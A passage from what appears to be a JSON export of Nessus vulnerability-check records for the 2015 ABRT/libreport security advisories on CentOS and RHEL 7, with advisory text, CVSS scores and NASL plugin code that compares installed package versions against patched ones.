(rpm_check(release:\"EL6\", reference:\"libreport-devel-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-filesystem-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-gtk-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-gtk-devel-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-newt-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-plugin-bugzilla-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-plugin-kerneloops-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-plugin-logger-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-plugin-mailx-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-plugin-reportuploader-2.0.9-21.0.1.el6_6.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"libreport-python-2.0.9-21.0.1.el6_6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / abrt-addon-python / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:56:32", "description": "Updated abrt packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect defects in applications and to create a bug report with all the information needed by a maintainer to fix it. It uses a plug-in system to extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT to attack, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus service. A local attacker could use these flaws to read and write arbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check the validity of the problem directory argument in the ChownProblemDir, DeleteElement, and DeleteProblem methods. A local attacker could use this flaw to take ownership of arbitrary files and directories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which correct these issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-16T00:00:00", "type": "nessus", "title": "CentOS 7 : abrt (CESA-2015:1083)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-01-04T00:00:00", "cpe": ["p-cpe:/a:centos:centos:abrt", "p-cpe:/a:centos:centos:abrt-addon-ccpp", "p-cpe:/a:centos:centos:abrt-addon-kerneloops", "p-cpe:/a:centos:centos:abrt-addon-pstoreoops", "p-cpe:/a:centos:centos:abrt-addon-python", "p-cpe:/a:centos:centos:abrt-addon-upload-watch", "p-cpe:/a:centos:centos:abrt-addon-vmcore", "p-cpe:/a:centos:centos:abrt-addon-xorg", "p-cpe:/a:centos:centos:abrt-cli", "p-cpe:/a:centos:centos:abrt-console-notification", "p-cpe:/a:centos:centos:abrt-dbus", "p-cpe:/a:centos:centos:abrt-desktop", "p-cpe:/a:centos:centos:abrt-devel", "p-cpe:/a:centos:centos:abrt-gui", "p-cpe:/a:centos:centos:abrt-gui-devel", "p-cpe:/a:centos:centos:abrt-gui-libs", "p-cpe:/a:centos:centos:abrt-libs", "p-cpe:/a:centos:centos:abrt-python", "p-cpe:/a:centos:centos:abrt-python-doc", "p-cpe:/a:centos:centos:abrt-retrace-client", "p-cpe:/a:centos:centos:abrt-tui", "p-cpe:/a:centos:centos:libreport", "p-cpe:/a:centos:centos:libreport-anaconda", "p-cpe:/a:centos:centos:libreport-centos", "p-cpe:/a:centos:centos:libreport-cli", "p-cpe:/a:centos:centos:libreport-compat", "p-cpe:/a:centos:centos:libreport-devel", "p-cpe:/a:centos:centos:libreport-filesystem", "p-cpe:/a:centos:centos:libreport-gtk", "p-cpe:/a:centos:centos:libreport-gtk-devel", "p-cpe:/a:centos:centos:libreport-newt", "p-cpe:/a:centos:centos:libreport-plugin-bugzilla", "p-cpe:/a:centos:centos:libreport-plugin-kerneloops", "p-cpe:/a:centos:centos:libreport-plugin-logger", "p-cpe:/a:centos:centos:libreport-plugin-mailx", "p-cpe:/a:centos:centos:libreport-plugin-mantisbt", "p-cpe:/a:centos:centos:libreport-plugin-reportuploader", "p-cpe:/a:centos:centos:libreport-plugin-rhtsupport", "p-cpe:/a:centos:centos:libreport-plugin-ureport", "p-cpe:/a:centos:centos:libreport-python", "p-cpe:/a:centos:centos:libreport-rhel", "p-cpe:/a:centos:centos:libreport-rhel-anaconda-bugzilla", "p-cpe:/a:centos:centos:libreport-rhel-bugzilla", "p-cpe:/a:centos:centos:libreport-web", "p-cpe:/a:centos:centos:libreport-web-devel", "cpe:/o:centos:centos:7"], "id": "CENTOS_RHSA-2015-1083.NASL", "href": "https://www.tenable.com/plugins/nessus/84197", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2015:1083 and \n# CentOS Errata and Security Advisory 2015:1083 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84197);\n script_version(\"2.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-1869\", \"CVE-2015-1870\", \"CVE-2015-3142\", \"CVE-2015-3147\", \"CVE-2015-3150\", \"CVE-2015-3151\", \"CVE-2015-3159\", \"CVE-2015-3315\");\n script_bugtraq_id(75116, 75117, 75118, 75119, 75122, 75124, 75128, 75129);\n script_xref(name:\"RHSA\", value:\"2015:1083\");\n\n script_name(english:\"CentOS 7 : abrt (CESA-2015:1083)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated abrt packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect\ndefects in applications and to create a bug report with all the\ninformation needed by a maintainer to fix it. It uses a plug-in system\nto extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and\nsymbolic link flaws. A local attacker could use these flaws to\npotentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided\nby ABRT wrote core dumps to files owned by other system users. This\ncould result in information disclosure if an application crashed while\nits current directory was a directory writable to by other users (such\nas /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by\nABRT did not handle symbolic links correctly. A local attacker with\nwrite access to an ABRT problem directory could use this flaw to\nescalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy\nof an sosreport file in ABRT problem directories, and included\nexcerpts of /var/log/messages selected by the user-controlled process\nname, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain\ndirectories, abrt-handle-upload did not verify that the new problem\ndirectory had appropriate permissions and did not contain symbolic\nlinks. An attacker able to create a crafted problem report could use\nthis flaw to expose other parts of ABRT to attack, or to overwrite\narbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus\nservice. A local attacker could use these flaws to read and write\narbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly\ncheck the validity of the problem directory argument in the\nChownProblemDir, DeleteElement, and DeleteProblem methods. A local\nattacker could use this flaw to take ownership of arbitrary files and\ndirectories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache\nhelper program did not properly filter the process environment before\ninvoking abrt-action-install-debuginfo. A local attacker could use\nthis flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages,\nwhich correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2015-June/021170.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?24a453ec\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected abrt packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-3315\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ABRT raceabrt Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-ccpp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-pstoreoops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-upload-watch\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-vmcore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-addon-xorg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-console-notification\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-dbus\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-gui-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-gui-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-python-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-retrace-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:abrt-tui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-anaconda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-centos\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-cli\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-compat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-filesystem\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-gtk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-gtk-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-newt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-kerneloops\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-logger\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-mailx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-mantisbt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-reportuploader\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-rhtsupport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-plugin-ureport\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-python\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-rhel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-rhel-anaconda-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-rhel-bugzilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-web\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:libreport-web-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/06/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-ccpp-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-kerneloops-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-pstoreoops-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-python-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-upload-watch-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-vmcore-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-addon-xorg-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-cli-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-console-notification-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-dbus-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-desktop-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-devel-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-gui-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-gui-devel-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-gui-libs-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-libs-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-python-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-python-doc-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-retrace-client-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"abrt-tui-2.1.11-22.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-anaconda-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-centos-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-cli-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-compat-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-devel-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-filesystem-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-gtk-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-gtk-devel-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-newt-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-bugzilla-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-kerneloops-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-logger-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-mailx-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-mantisbt-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-reportuploader-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-rhtsupport-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-plugin-ureport-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-python-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-rhel-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-rhel-anaconda-bugzilla-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-rhel-bugzilla-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-web-2.1.11-23.el7.centos.0.1\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"libreport-web-devel-2.1.11-23.el7.centos.0.1\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"abrt / abrt-addon-ccpp / abrt-addon-kerneloops / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-01-11T14:56:46", "description": "Updated abrt packages that fix multiple security issues are now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nABRT (Automatic Bug Reporting Tool) is a tool to help users to detect defects in applications and to create a bug report with all the information needed by a maintainer to fix it. It uses a plug-in system to extend its functionality.\n\nIt was found that ABRT was vulnerable to multiple race condition and symbolic link flaws. A local attacker could use these flaws to potentially escalate their privileges on the system. (CVE-2015-3315)\n\nIt was discovered that the kernel-invoked coredump processor provided by ABRT wrote core dumps to files owned by other system users. This could result in information disclosure if an application crashed while its current directory was a directory writable to by other users (such as /tmp). (CVE-2015-3142)\n\nIt was discovered that the default event handling scripts installed by ABRT did not handle symbolic links correctly. A local attacker with write access to an ABRT problem directory could use this flaw to escalate their privileges. (CVE-2015-1869)\n\nIt was found that the ABRT event scripts created a user-readable copy of an sosreport file in ABRT problem directories, and included excerpts of /var/log/messages selected by the user-controlled process name, leading to an information disclosure. (CVE-2015-1870)\n\nIt was discovered that, when moving problem reports between certain directories, abrt-handle-upload did not verify that the new problem directory had appropriate permissions and did not contain symbolic links. An attacker able to create a crafted problem report could use this flaw to expose other parts of ABRT to attack, or to overwrite arbitrary files on the system. (CVE-2015-3147)\n\nMultiple directory traversal flaws were found in the abrt-dbus D-Bus service. A local attacker could use these flaws to read and write arbitrary files as the root user. (CVE-2015-3151)\n\nIt was discovered that the abrt-dbus D-Bus service did not properly check the validity of the problem directory argument in the ChownProblemDir, DeleteElement, and DeleteProblem methods. A local attacker could use this flaw to take ownership of arbitrary files and directories, or to delete files and directories as the root user.\n(CVE-2015-3150)\n\nIt was discovered that the abrt-action-install-debuginfo-to-abrt-cache helper program did not properly filter the process environment before invoking abrt-action-install-debuginfo. A local attacker could use this flaw to escalate their privileges on the system. (CVE-2015-3159)\n\nAll users of abrt are advised to upgrade to these updated packages, which correct these issues.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2015-06-10T00:00:00", "type": "nessus", "title": "RHEL 7 : abrt (RHSA-2015:1083)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1869", "CVE-2015-1870", "CVE-2015-3142", "CVE-2015-3147", "CVE-2015-3150", "CVE-2015-3151", "CVE-2015-3159", "CVE-2015-3315"], "modified": "2021-02-05T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:abrt", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-ccpp", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-kerneloops", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-pstoreoops", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-python", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-upload-watch", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-vmcore", "p-cpe:/a:redhat:enterprise_linux:abrt-addon-xorg", "p-cpe:/a:redhat:enterprise_linux:abrt-cli", "p-cpe:/a:redhat:enterprise_linux:abrt-console-notification", "p-cpe:/a:redhat:enterprise_linux:abrt-dbus", "p-cpe:/a:redhat:enterprise_linux:abrt-debuginfo", "p-cpe:/a:redhat:enterprise_linux:abrt-desktop", "p-cpe:/a:redhat:enterprise_linux:abrt-devel", "p-cpe:/a:redhat:enterprise_linux:abrt-gui", "p-cpe:/a:redhat:enterprise_linux:abrt-gui-devel", 